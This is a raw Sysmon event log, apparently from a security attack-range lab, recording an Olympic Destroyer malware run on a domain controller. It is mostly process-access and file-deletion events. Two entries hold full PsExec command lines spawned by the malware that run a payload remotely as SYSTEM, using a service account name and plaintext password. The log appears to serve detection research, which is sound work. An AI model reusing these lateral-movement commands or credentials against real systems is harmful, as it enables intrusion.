23542300x8000000000000000291839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:59.531{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A7295676CC74C69D77D7ED72D1CBE016,SHA256=7362A97D02604A84137B11E2A9991A023ED8D064AF07C315A50C51F55A125BC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:59.284{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64CB10907629CDF211BFD129F081A968,SHA256=68B19377CF4D4912E0EB775A109C7775FC239351D488C74455745B152EAD2E7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:00.604{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A249BD66A1D1D7ABA3EB197730CDE470,SHA256=87158116FAC4D38FD3AD5C484936100006B7412AF484E2AEC81CD7C6BFE84434,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.956{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FC-6216-CA05-000000003802}2024C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.956{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FC-6216-CA05-000000003802}2024C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.916{C8EA50B7-12FC-6216-CA05-000000003802}20245264C:\Windows\system32\conhost.exe{C8EA50B7-12FC-6216-C905-000000003802}4508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.770{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FC-6216-CA05-000000003802}2024C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.754{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FC-6216-CA05-000000003802}2024C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.617{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12FC-6216-C905-000000003802}4508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.601{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.601{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.601{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.601{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.601{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-12FC-6216-C905-000000003802}4508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.603{C8EA50B7-12FC-6216-C905-000000003802}4508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-12.eu-central-1.compute.internal -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.601{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FC-6216-C905-000000003802}4508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.570{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1622862E5687A4E209CEF8955ADB5F47,SHA256=550FEF11E871BB70075A57C2A2C7CCEDD87C6C8967B35795755099A897DC1D16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:00.286{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D151A1CC950C1417EA028A379970FAA0,SHA256=CEC1774AFA63A656A5AF785109D288D1DE7F9300010B56D70B2223C4FCA77956,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.604{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53653-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000217757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:01.822{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03873463CAD6B49C873C5F7F61EE75EA,SHA256=7A37B9FAE1F2210652050345864DEFC591578A3F9799B0925118789A264ADE47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.703{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-D105-000000003802}6408C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.703{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-D105-000000003802}6408C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.703{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-D205-000000003802}6424C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.703{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-12FD-6216-D205-000000003802}6424C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.706{C8EA50B7-12FD-6216-D205-000000003802}6424C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.703{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FD-6216-D205-000000003802}6424C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.687{C8EA50B7-12FD-6216-CD05-000000003802}4900C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.687{C8EA50B7-12FD-6216-D105-000000003802}64086444C:\Windows\system32\conhost.exe{C8EA50B7-12FD-6216-CF05-000000003802}6360C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.687{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-CD05-000000003802}4900C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.687{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-CD05-000000003802}4900C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:01.672{C8EA50B7-12FD-6216-CD05-000000003802}4900C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.651{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-D105-000000003802}6408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.634{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FD-6216-D105-000000003802}6408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.620{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-D005-000000003802}7112C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.620{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-D005-000000003802}7112C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.587{C8EA50B7-12FD-6216-D005-000000003802}71126200C:\Windows\system32\conhost.exe{C8EA50B7-12FD-6216-CD05-000000003802}4900C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.587{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\nt